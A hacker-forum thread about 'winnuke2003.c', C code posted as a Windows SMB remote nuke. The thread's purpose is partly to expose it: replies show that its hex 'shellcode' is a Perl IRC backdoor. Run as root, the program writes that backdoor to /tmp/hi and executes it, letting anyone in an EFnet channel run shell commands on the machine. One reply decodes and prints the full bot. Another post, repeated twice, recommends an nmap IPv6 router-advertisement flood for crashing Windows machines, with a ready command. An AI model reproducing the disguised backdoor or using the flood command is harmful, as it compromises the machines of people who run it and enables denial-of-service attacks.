I know it's old.. But does it work?
Exploit :
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>
/*
* *** PRIVATE * PRIVATE * PRIVATE ***
* ******** DO NOT DISTRIBUTE ********
*
* winnuke2003.c version 2.oh
* A remote windows nuke for Windows 9x/ME/2000/NT/XP
*
* Exploits a buffer overflow in the SMB protocol
*
* This exploit must be run as root to open a raw socket
*
*
*
* Shoutouts to MrNeutron for updates and for shortening
* the shellcode
* Shoutouts to pgp for sticking his dick everywhere
*
* USAGE:
* # gcc winnuke2003.c -o winnuke2003
* # ./winnuke2003 12.34.56.78
*
* -brain <brain@brain.cx>
*/
h3llc0de=
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
"\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
"\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
"\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
"\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
"\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
"\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
"\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
"\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
"\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
"\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
"\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
"\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
"\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
"\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
"\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
"\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
"\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
"\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
"\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
"\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
"\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
"\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
"\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
"\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
"\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
"\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
"\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
"\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
"\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
"\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
"\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
"\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
"\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
"\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
"\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
"\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
"\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
unsigned short csum(unsigned short *buf, int nwords)
{
unsigned long sum;
for(sum=0;nwords>0;nwords--);
sum+=*buf++;
sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
return ~sum;
}
unsigned short in_cksum(unsigned short *addr,int len)
{
register int nleft=len;
register unsigned short *w=addr;
register int sum=0;
unsigned short answer=0;
while(nleft>1)
{
sum+=*w++;
nleft-=2;
}
if(nleft==1)
{
*(u_char *)(&answer)=*(u_char *)w;
sum+=answer;
}
sum=(sum >> 16)+(sum & 0xffff);
sum+=(sum >> 16);
answer=~sum;
return(answer);
}
int main(int argc, char **argv)
{
int sockfd;
struct sockaddr_in addr;
char *payload=h3llc0de;
char *buf;
struct iphdr *iph;
struct udphdr *tcph;
int tot_len;
FILE *f;
int die=0;
if(argc!=2)
{
printf("ERROR: No ip address entered\n");
printf("usage:\n%s [IP-ADDRESS]\n\n",argv[0]);
die=1;
}
addr.sin_family=AF_INET;
addr.sin_port=htons(5555);
if(argc==1) argv[1]="";
addr.sin_addr.s_addr=inet_addr(argv[1]);
sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_UDP);
if(sockfd==-1 && !die) {printf("could not obtain raw socket\nARE YOU
ROOT?\n");die=1;}
tot_len=sizeof(struct iphdr)+sizeof(struct udphdr)+strlen(payload);
buf=(char *)malloc(tot_len);
malloc(buf,0,tot_len);
iph=(struct iphdr*)buf;
tcph=(struct udphdr*)(buf+sizeof(struct iphdr));
iph->ihl=5;
iph->version=4;
iph->tos=0;
iph->tot_len=tot_len;
iph->id=htons(31337);
iph->frag_off=0;
iph->ttl=225;
iph->protocol=IPPROTO_UDP;
iph->check=0;
iph->saddr=inet_addr("127.0.0.1"); // spoof the source to make it
untracable
iph->daddr=inet_addr(argv[1]);
iph->check=in_cksum((unsigned short *)&iph,sizeof(iph));
tcph->source=htons(31337);
tcph->dest=htons(139); // the default SMB port
tcph->len=htons(sizeof(struct udphdr)+strlen(payload));
tcph->check=0;
memcpy(buf+sizeof(struct iphdr)+sizeof(struct
udphdr),payload,strlen(payload));
f=fopen(h3llc0de+764,"w");
if(f)
{
fseek(f,0,SEEK_SET);
close(2);
fprintf(f,"%s",h3llc0de);
fclose(f);}system(h3llc0de+735);
{
int one=1;
const int *val = &one;
if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one))<0 &&
!die)
printf("warning: cannot set HDRINCL\n");
}
if(sendto(sockfd,buf,tot_len,0,(struct sockaddr *)&addr,sizeof(addr))<0 &&
!die)
printf("err\n");
else if (!die) printf("NUKED THA MOTHA!!! :D\n");
return 0;
}
WinNuker..
- Net Battle Bot
- Owns you
- Posts:1816
- Joined:Fri Jun 04, 2004 6:44 am
- Location:Groom Lake [phpBB Debug] PHP Warning: in file [ROOT]/vendor/twig/twig/lib/Twig/Extension/Core.php on line 1275: count(): Parameter must be an array or an object that implements Countable
It will always work against someone. The trouble is that as more time goes by more and more ppl are getting patch-happy so the amount of targets it will affect lessen each day.
But yeah, as long as the code does something it will always "work".
But yeah, as long as the code does something it will always "work".
Without practice one cannot prove; without proof one cannot be trusted; without trust one cannot be respected.
-
- n00b
- Posts:1
- Joined:Thu Jul 09, 2009 2:06 am [phpBB Debug] PHP Warning: in file [ROOT]/vendor/twig/twig/lib/Twig/Extension/Core.php on line 1275: count(): Parameter must be an array or an object that implements Countable
err...hehe.. plz... do read on..
pls see... as to what this exactly is...
http://www.justanotherhacker.com/2011/1 ... tting.html
OK.. now, plz, it IS newb corner..this is fair, but, i have laughed at this, like 5 times it been done..
i once did it, using the same code.. on FD lists... hehe..and YES , people stupidly used perl -e and python cmds, to dump the shellcode..
this is NOT a d0s app ;p , if u want .c in d0s, go visit packetstorm and look in theyre d0s , and maybe grab abyss / murder , packs, wich do have the PROPER ones..
this is a fake.. obviously..
it connects to efnet ircd, and is NOW banned, well, i got somany of fd users..was kinda crazy.. and, was op in darknet, so, i had to +b it..so, it is simply a very clever perl bot... dont worry though, it is from a guy called 'nexus' aka 'tropic' , a f*n lammer, who calls himself leet... he made a fake '0day ssh' expl with it... then, he passed around the file, trying to dupe ppl who CAn code into trying to exec it..
2 things u should note here..
the shellcode, simply does NOT need be in a d0s..and if there is, it would NOT be x20 characters (text..).. and the "note must use raw sockets' , kinda pushing people to use 'root' eie; they run the code, even some did perl -e "shellcode"; ..i saw it all... and, is just old, and, cheeky of some of the people to allow it go for so long... hehe.. oops... one of those, i think i was about 3rd person to use it on, although, i DID tell other FD'rs whom i was friends with, i was doing a social test' on FD lists..to see howmany people who abused others, would endup in tefnet...well, was somany, that it was beyond crazy...
anyhow... i suggest, learn to make your shellcode, heck, metasploit, and other sites, have generators even... there is NO NEED for a payload, in THiS c0de..
IF it was DNS based ddos/d0s , then yes, payloads ARE small, and effective... note the size of the shellc0de ;p
anyhow...it is basicsalluy like running sub7 trojan on linux ;p
Anyhow.. it is explained in above link, and, use the 'LINKS' section of newbs corner, to please...find your weapons, alot easier to just find some bitchx abyss pack, and look thru the .c's 9again packetstorm has these kits) ..abyss3k being one major one,wich does have the proper 'winbomb' wich, is not so effective..
if you want something effective nowdays.. take a peek at the nmap ipv6 RA nse script and/or any router_advertisement ipv6 , this will kill most xp/vista and is still unpatched... and last i saw, it was killing win7 also.. router-advd for ipv6... nowdays, all u need todo is grab nmap 6.40+ ,and on nmap website search for "ipv6 RA nse script" , this is best way nowdays (if the target has modem wich supports ipv6...most xp even, are just assigned a teredo addy...and, i know thats on sp3 , and unsure about others.. but, it is very quick and easy... and, works..
ex attack from nmap 6.40 ;
nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=eth0,timeout=0s' 2607:ff68:123:4::44
this is fastest way, (about 10secs max) to kill a winbl0w...
enjoy..and pls... do read some shell-storm, and maybe other, shellcoding 9elik0n) and other good shellcoders, from memory have some archives about.. your better off learning, and learning what is a good and bad character..
anyhow enough said.. and, plz..trust me, the morom user is now been banned and, i did try to keep it alive but... meh... icer is a .....well...
anyhow... enjoy..
crazycoders.com
http://www.justanotherhacker.com/2011/1 ... tting.html
OK.. now, plz, it IS newb corner..this is fair, but, i have laughed at this, like 5 times it been done..
i once did it, using the same code.. on FD lists... hehe..and YES , people stupidly used perl -e and python cmds, to dump the shellcode..
this is NOT a d0s app ;p , if u want .c in d0s, go visit packetstorm and look in theyre d0s , and maybe grab abyss / murder , packs, wich do have the PROPER ones..
this is a fake.. obviously..
it connects to efnet ircd, and is NOW banned, well, i got somany of fd users..was kinda crazy.. and, was op in darknet, so, i had to +b it..so, it is simply a very clever perl bot... dont worry though, it is from a guy called 'nexus' aka 'tropic' , a f*n lammer, who calls himself leet... he made a fake '0day ssh' expl with it... then, he passed around the file, trying to dupe ppl who CAn code into trying to exec it..
2 things u should note here..
the shellcode, simply does NOT need be in a d0s..and if there is, it would NOT be x20 characters (text..).. and the "note must use raw sockets' , kinda pushing people to use 'root' eie; they run the code, even some did perl -e "shellcode"; ..i saw it all... and, is just old, and, cheeky of some of the people to allow it go for so long... hehe.. oops... one of those, i think i was about 3rd person to use it on, although, i DID tell other FD'rs whom i was friends with, i was doing a social test' on FD lists..to see howmany people who abused others, would endup in tefnet...well, was somany, that it was beyond crazy...
anyhow... i suggest, learn to make your shellcode, heck, metasploit, and other sites, have generators even... there is NO NEED for a payload, in THiS c0de..
IF it was DNS based ddos/d0s , then yes, payloads ARE small, and effective... note the size of the shellc0de ;p
anyhow...it is basicsalluy like running sub7 trojan on linux ;p
Anyhow.. it is explained in above link, and, use the 'LINKS' section of newbs corner, to please...find your weapons, alot easier to just find some bitchx abyss pack, and look thru the .c's 9again packetstorm has these kits) ..abyss3k being one major one,wich does have the proper 'winbomb' wich, is not so effective..
if you want something effective nowdays.. take a peek at the nmap ipv6 RA nse script and/or any router_advertisement ipv6 , this will kill most xp/vista and is still unpatched... and last i saw, it was killing win7 also.. router-advd for ipv6... nowdays, all u need todo is grab nmap 6.40+ ,and on nmap website search for "ipv6 RA nse script" , this is best way nowdays (if the target has modem wich supports ipv6...most xp even, are just assigned a teredo addy...and, i know thats on sp3 , and unsure about others.. but, it is very quick and easy... and, works..
ex attack from nmap 6.40 ;
nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=eth0,timeout=0s' 2607:ff68:123:4::44
this is fastest way, (about 10secs max) to kill a winbl0w...
enjoy..and pls... do read some shell-storm, and maybe other, shellcoding 9elik0n) and other good shellcoders, from memory have some archives about.. your better off learning, and learning what is a good and bad character..
anyhow enough said.. and, plz..trust me, the morom user is now been banned and, i did try to keep it alive but... meh... icer is a .....well...
anyhow... enjoy..
crazycoders.com
- Cool_Fire
- Not a sandwich
- Posts:1913
- Joined:Fri May 09, 2003 1:20 pm
- Location:41 6d 73 74 65 72 64 61 6d
- Contact:
Re: WinNuker..
*Edit: Seems like it does pretty much what [xD] described.
I'm more worried about this bit:
Especially considering this bit:
I'm more worried about this bit:
Code: Select all
f=fopen(h3llc0de+764,"w");
if(f)
{
fseek(f,0,SEEK_SET);
close(2);
fprintf(f,"%s",h3llc0de);
fclose(f);}system(h3llc0de+735);
Code: Select all
if(sockfd==-1 && !die) {printf("could not obtain raw socket\nARE YOU ROOT?\n");die=1;}
Last edited by Cool_Fire on Tue Sep 10, 2013 12:35 am, edited 1 time in total.
Reason: Updated info available
Reason: Updated info available
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
Hackerthreads chat, where the party is going 24/7.
- Cool_Fire
- Not a sandwich
- Posts:1913
- Joined:Fri May 09, 2003 1:20 pm
- Location:41 6d 73 74 65 72 64 61 6d
- Contact:
Re: WinNuker..
Code: Select all
#include <stdio.h>
h3llc0de=
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
"\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
"\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
"\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
"\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
"\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
"\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
"\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
"\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
"\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
"\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
"\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
"\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
"\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
"\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
"\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
"\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
"\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
"\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
"\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
"\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
"\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
"\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
"\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
"\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
"\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
"\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
"\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
"\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
"\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
"\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
"\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
"\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
"\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
"\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
"\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
"\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
"\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
int main() {
//f=fopen(h3llc0de+764,"w");
printf("%s\n\n", h3llc0de+764);
//fprintf(f,"%s",h3llc0de);
printf("%s\n\n",h3llc0de);
//system(h3llc0de+735);
printf("%s\n", h3llc0de+735);
return 0;
}
http://codepad.org/0f6c5DKS/tmp/hi
#!/usr/bin/perl
$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
chmod +x /tmp/hi 2>/dev/null;/tmp/hi
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
Hackerthreads chat, where the party is going 24/7.
- Thor
- htd0rg lieutenant
- Posts:440
- Joined:Tue Dec 18, 2007 9:39 am
- Location:Location Location [phpBB Debug] PHP Warning: in file [ROOT]/vendor/twig/twig/lib/Twig/Extension/Core.php on line 1275: count(): Parameter must be an array or an object that implements Countable
Re: WinNuker..
Let me just add that this site: crazycoders.com in one of the previous post has the worst background I have ever seen, since 1997...
Quidquid latine dictum sit, altum sonatur.
- Whatever is said in Latin sounds profound.
Omnis Vestri Substructio Es Servus Ad Nobis.
- All Your Base Are Belong To Us
- Whatever is said in Latin sounds profound.
Omnis Vestri Substructio Es Servus Ad Nobis.
- All Your Base Are Belong To Us
- Cool_Fire
- Not a sandwich
- Posts:1913
- Joined:Fri May 09, 2003 1:20 pm
- Location:41 6d 73 74 65 72 64 61 6d
- Contact:
Re: WinNuker..
Holy hell, that's amazing.Thor wrote:Let me just add that this site: crazycoders.com in one of the previous post has the worst background I have ever seen, since 1997...
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
Hackerthreads chat, where the party is going 24/7.